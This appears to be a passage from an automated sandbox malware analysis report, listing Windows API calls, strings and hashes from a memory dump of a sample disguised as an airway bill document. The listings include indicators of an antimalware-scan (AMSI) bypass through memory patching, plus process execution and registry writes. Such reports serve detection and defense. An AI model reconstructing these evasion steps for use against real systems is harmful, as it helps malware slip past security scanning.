                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: 0`
                                                                                                    • API String ID: 3472027048-3339448193
                                                                                                    • Opcode ID: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
                                                                                                    • Instruction ID: 7c5f3a25644ed6ebf611e114c42ff20b3baec98efa00132b2af18c46f2bfe774
                                                                                                    • Opcode Fuzzy Hash: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
                                                                                                    • Instruction Fuzzy Hash: 02B12072A103608BDB15CF2CD880356BBE1EF85394F1886EAE65D8F386D730E559CB90

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,02B21FE4), ref: 02B21B17
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B21FE4), ref: 02B21B31
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: 0`
                                                                                                    • API String ID: 3472027048-3339448193
                                                                                                    • Opcode ID: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
                                                                                                    • Instruction ID: 15f6aa8c18e736209029873f2ff6309f338767204e6b9020b7871a9205268b97
                                                                                                    • Opcode Fuzzy Hash: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
                                                                                                    • Instruction Fuzzy Hash: D7519D716213608FE715CF6C8988756BBE4EF46314F1886EEE54C8B283E770D549CBA1

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(amsi), ref: 02B3870D
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                      • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B3876C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                    • String ID: DllGetClassObject$W$amsi
                                                                                                    • API String ID: 941070894-2671292670
                                                                                                    • Opcode ID: 5d64c744f737d4c36fb827dc9532959cc4cbb49c1899778a38b492eef03d278d
                                                                                                    • Instruction ID: 37abefbfcc5c8ee36c11fd9ee1d11580322bfdfa4d3143f1c517c61cdc131b6d
                                                                                                    • Opcode Fuzzy Hash: 5d64c744f737d4c36fb827dc9532959cc4cbb49c1899778a38b492eef03d278d
                                                                                                    • Instruction Fuzzy Hash: 46F068A054C381B9E202E6748C45F4BBFCE4B52224F448A9DF1E85A2D2DA75D10497B7

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E42E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckConnectionInternet
                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                    • Opcode ID: ef807b0571ce6bb4c34373b662ac0581569047f813d11b172c8a42f20411da7e
                                                                                                    • Instruction ID: d096c1d191ac557db11252cd9f16b43f3203b39444e2382723f994a6279957dc
                                                                                                    • Opcode Fuzzy Hash: ef807b0571ce6bb4c34373b662ac0581569047f813d11b172c8a42f20411da7e
                                                                                                    • Instruction Fuzzy Hash: D4412135B102189FEB02EBA4DC41ADEB3FAEF4C710F1148A6E555B7A50DA74ED098F50

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                    • GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    • FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 1543721669-0
                                                                                                    • Opcode ID: 50eff430e3eb5ad79b795481d1ff15eef59c9c414066a1f6dba77ab2eddfd947
                                                                                                    • Instruction ID: 6746e6d7a2ee8829c2ce62925da09a310af8d5375e1c9a0bc673fc3e8ef8fb9f
                                                                                                    • Opcode Fuzzy Hash: 50eff430e3eb5ad79b795481d1ff15eef59c9c414066a1f6dba77ab2eddfd947
                                                                                                    • Instruction Fuzzy Hash: 1D115EB1A51318BFEB01FBA8CC01A5E77AEEB45700F5048E4B60CF7A90DA749D16DB15
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • WinExec.KERNEL32(?,?), ref: 02B38470
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                                                    • String ID: Kernel32$WinExec
                                                                                                    • API String ID: 2292790416-3609268280
                                                                                                    • Opcode ID: 2678400622ca416fd6e548489f690ef4354d33f3ffc8af8695e591d23c9f204b
                                                                                                    • Instruction ID: 5248a44913d1f95b3415932f54802902e221bda5d31eb823c03394d0ff59fdc0
                                                                                                    • Opcode Fuzzy Hash: 2678400622ca416fd6e548489f690ef4354d33f3ffc8af8695e591d23c9f204b
                                                                                                    • Instruction Fuzzy Hash: CB01A439654304BFEB02EFA8DC41F5A77EDE748710F5184A0B508D7E50D634AD04DE22
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • WinExec.KERNEL32(?,?), ref: 02B38470
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                                                    • String ID: Kernel32$WinExec
                                                                                                    • API String ID: 2292790416-3609268280
                                                                                                    • Opcode ID: f2e4eab999c3dbba6705771c0c34a1298baa87a820816fc6fc720bac6e52c443
                                                                                                    • Instruction ID: aa15607668edd3928571eb1e52a6619f9466bc7e05532dbea38096e55801e32c
                                                                                                    • Opcode Fuzzy Hash: f2e4eab999c3dbba6705771c0c34a1298baa87a820816fc6fc720bac6e52c443
                                                                                                    • Instruction Fuzzy Hash: 75F0A439654304BFEB02EFA8DC41F5A77EDE748710F5184A0B508D7E50D634A904DE22
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C08
                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C36
                                                                                                      • Part of subcall function 02B27D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B33880,02B35C76,00000000,02B35CF4,?,?,02B33880), ref: 02B27D5E
                                                                                                      • Part of subcall function 02B27F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B33880,02B35C91,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B27F37
                                                                                                    • GetLastError.KERNEL32(00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C9B
                                                                                                      • Part of subcall function 02B2A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B2C359,00000000,02B2C3B3), ref: 02B2A717
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 503785936-0
                                                                                                    • Opcode ID: 0d4d53a1d4632ce329ab578801f9b964810193524102552871df7e031314d89d
                                                                                                    • Instruction ID: 679de02c7d1e6923f602fde8100a4eae514b70061ba55b019b93c06bb71eb56c
                                                                                                    • Opcode Fuzzy Hash: 0d4d53a1d4632ce329ab578801f9b964810193524102552871df7e031314d89d
                                                                                                    • Instruction Fuzzy Hash: AD317270A003149FDB11EFA8C88179EB7F6AF48314F9084A5E518AB380DB755A498FA5
                                                                                                    APIs
                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02C75914), ref: 02B3E6FC
                                                                                                    • RegSetValueExA.ADVAPI32(00000A74,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E734
                                                                                                    • RegCloseKey.ADVAPI32(00000A74,00000A74,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E73F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 779948276-0
                                                                                                    • Opcode ID: 3bda509cbd0030ad49cae28b5463df5f57e964b99a90ced8bc5b970ff279b1eb
                                                                                                    • Instruction ID: f606575ae45da6468a978fbeed0b42716142a2fb6fe5f03ac61dbf3ab40ceb67
                                                                                                    • Opcode Fuzzy Hash: 3bda509cbd0030ad49cae28b5463df5f57e964b99a90ced8bc5b970ff279b1eb
                                                                                                    • Instruction Fuzzy Hash: FD110371A10314AFE701EBA4DC819AD7BBDEB49750F5005A1FA08D7650D734DE45CE61
                                                                                                    APIs
                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02C75914), ref: 02B3E6FC
                                                                                                    • RegSetValueExA.ADVAPI32(00000A74,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E734
                                                                                                    • RegCloseKey.ADVAPI32(00000A74,00000A74,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E73F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 779948276-0
                                                                                                    • Opcode ID: e4d33faea1f7bf83cdc0f58fcaed900246599f581c551c8a6db067d1e01106dc
                                                                                                    • Instruction ID: c8121d2c3b9e1f3927617ade14a9987146b90d8259490800ccdc2d05c24774b8
                                                                                                    • Opcode Fuzzy Hash: e4d33faea1f7bf83cdc0f58fcaed900246599f581c551c8a6db067d1e01106dc
                                                                                                    • Instruction Fuzzy Hash: 58110371A10314AFE701EBA4D88199D7BBDEB49750F5005A1F608D7650D734DA45CE61
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
                                                                                                    • Instruction ID: ac36e5fc09ac2e5a5db20bfa2257a53e0431beb31e33cb5368e76ff476ffc371
                                                                                                    • Opcode Fuzzy Hash: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
                                                                                                    • Instruction Fuzzy Hash: 02F0C861718330C79B227B3B9E845AD27969F0874275494E5A44E9B205CB24EC0DCB62
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 02B24D07
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02B24D19
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 986138563-0
                                                                                                    • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                    • Instruction ID: 6c3f78a8d2133a0a27c54277c824a072fa3944722b1e73d9c2f04514de68636a
                                                                                                    • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                    • Instruction Fuzzy Hash: 7FE012B81153216EEF182F299C40B37373AEFC1751B5454D9B84CCA555D734C449AD34
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02B3735A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID: H
                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                    • Opcode ID: 5baef3381a6c8807b203f98fbb0906fcec12689b736a6d94da10fc836989e3e9
                                                                                                    • Instruction ID: bdf4cf3cc3a075be054efa66091c9afff1584f06097c7ae130a589e2b765ba8f
                                                                                                    • Opcode Fuzzy Hash: 5baef3381a6c8807b203f98fbb0906fcec12689b736a6d94da10fc836989e3e9
                                                                                                    • Instruction Fuzzy Hash: 7AB1D3B5A01608EFDB15CF99D980A9DFBF2FF4A314F1481A9E845AB360DB30A845DF50
                                                                                                    APIs
                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B2E701
                                                                                                      • Part of subcall function 02B2E2E4: VariantClear.OLEAUT32(?), ref: 02B2E2F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy
                                                                                                    • String ID:
                                                                                                    • API String ID: 274517740-0
                                                                                                    • Opcode ID: 811235bc3c524b9a37ccc01ed7704c2e3d01b5f70b1f2672f8d4b1283c1adafe
                                                                                                    • Instruction ID: 3859d639ccd92b464da088c1717b4148f827e8fe83a52248a4dc4fbe64e6451b
                                                                                                    • Opcode Fuzzy Hash: 811235bc3c524b9a37ccc01ed7704c2e3d01b5f70b1f2672f8d4b1283c1adafe
                                                                                                    • Instruction Fuzzy Hash: C311703070033097CB21EF6AC8C4A6A77AAEF5965071454E6E64E8B265DB30EC0DCAA1
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B21A03,?,02B22000), ref: 02B215E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID: 0`
                                                                                                    • API String ID: 4275171209-3339448193
                                                                                                    • Opcode ID: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
                                                                                                    • Instruction ID: 6bc3129b6980054ab98f3620fc1b0261f8c5fa94a0e7c892ea6541d6774eab5c
                                                                                                    • Opcode Fuzzy Hash: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
